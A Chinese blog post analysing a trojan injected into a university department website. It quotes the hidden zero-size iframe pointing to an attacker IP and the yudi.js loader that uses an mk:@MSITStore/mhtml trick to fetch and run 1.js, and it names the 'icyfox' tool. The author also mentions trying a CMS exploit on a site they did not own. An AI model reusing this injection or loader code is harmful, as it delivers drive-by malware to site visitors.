本想远程解决一个服务器问题的,却发觉因为办公室的主机被我改了网关,没有办法远程连接,于是无意识的敲了学校主页的地方,然后又点击了某系的主页,打开发现是使用了动易系统。(这段时间帮朋友弄这个系统,算是有点认识了),看看地址栏,知道应该不是最新的版本,于是就到网上搜索了下看看有没有漏洞(那个朋友是个急性子,而且比较多疑,老是怀疑自己的系统被人黑,正好看看这个系统现在有没有出什么新漏洞)。发现最新的2005 sp2前一个版本sp1居然是有漏洞的,于是多了个心眼,按照漏洞说明想测试下,(参考http://blog.donews.com/gogoxboy/archive/2005/12/30/677282.aspx)但是在注册了一个用户后,登陆时立即发生错误,而且似乎是说在head前有html代码,有问题,正常修改的动易应该不会有这么弱智的问题吧!查看源代码,发现有在html前有“<iframe height=0 width=0 src="http://58.251.64.54/4/4.htm"></iframe><html>”,好可疑啊,正规的html怎么会犯这样的错误,而且是框架的高度和宽度都是0——明显的木马做法。
下载那个4.htm,查看源码得到yudi.js,再查看yudi.js,得到:
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));
document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"></OBJECT>');
解码data部份,得到
mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#
下载1.js,用ultraEdit打开,向下翻可看到“icyfox”,呵呵,狐狸尾巴露出来了,冰狐浪子的工具做出来的东西,看来要上网查下这个工具了
后记:虽然把木马也下回来了,但是,后来把问题反映给该系负责网页的老师后,他居然说早就知道这事,但是没有空把木马页面去掉,我晕,明知自己的网站有木马,但也不清掉(就只是把前面的木马嵌入语句去掉就可以了,这么简单的事),这也就是说别人上了我的网站即使中了木马也与我无关了,唉,心凉了,不管了。
7519
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
